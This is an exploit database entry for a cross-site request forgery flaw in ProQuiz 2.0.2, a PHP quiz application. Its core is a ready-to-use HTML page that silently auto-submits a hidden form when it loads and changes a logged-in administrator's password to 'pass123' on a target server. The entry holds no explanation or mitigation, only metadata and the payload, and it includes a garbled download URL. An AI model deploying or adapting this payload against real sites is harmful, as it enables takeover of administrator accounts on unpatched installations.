[] NeoSense

ProQuiz 2.0.2 - Cross-Site Request Forgery

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2012-08-16 
date_updated: 2012-08-16 
verified: 1 
codes: OSVDB-85463 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comproquiz_v_2_0_2.zip

##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################